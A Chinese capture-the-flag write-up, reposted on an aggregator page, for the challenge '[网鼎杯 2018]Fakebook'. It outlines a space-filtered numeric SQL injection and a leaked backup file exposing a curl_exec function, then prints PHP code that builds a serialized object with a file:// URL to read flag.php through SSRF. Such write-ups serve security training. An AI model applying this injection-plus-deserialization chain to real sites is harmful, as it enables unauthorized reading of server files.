欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 教育 > 高考 > [网鼎杯 2018]Fakebook

[网鼎杯 2018]Fakebook

2025/2/22 16:56:01 来源:https://blog.csdn.net/2401_87493916/article/details/144747581  浏览:    关键词:[网鼎杯 2018]Fakebook

[网鼎杯 2018]Fakebook

一个注册一个登录

看了看源码没什么有用的东西

注册一个用户

点击创建的用户名

发现上面有一个传参

通过测试是数字型

测试有4列

有过滤,通过测试是过滤了空格

第二位是回显位

查表

查字段

查数据

data是刚刚注册账号的序列化

不知道是怎么触发的,扫一下目录看看有没有敏感信息泄露

访问/user.php.bak,是一个文件下载下来

记事本打开是php代码

get方法里面存在 curl_exec()

isValidBlog()的正则表达式。

又看了一下上面注入的报错信息

这里可能进行了反序列化,然后根据上面的php代码文件,curl可能存在ssrf

function get($url){$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$output = curl_exec($ch);$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);if($httpCode == 404) {return 404;}curl_close($ch);return $output;}

通过上面的报错信息我们猜测flag是flag.php

然后我们构造一下序列化

<?phpclass UserInfo
{public $name = "";public $age = 0;public $blog = "file:///var/www/html/flag.php";}
echo serialize(new UserInfo());
O:8:"UserInfo":3:{s:4:"name";s:0:"";s:3:"age";i:0;s:4:"blog";s:29:"file:///var/www/html/flag.php";}

然后通过sql注入写到里面

查看源码

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

热搜词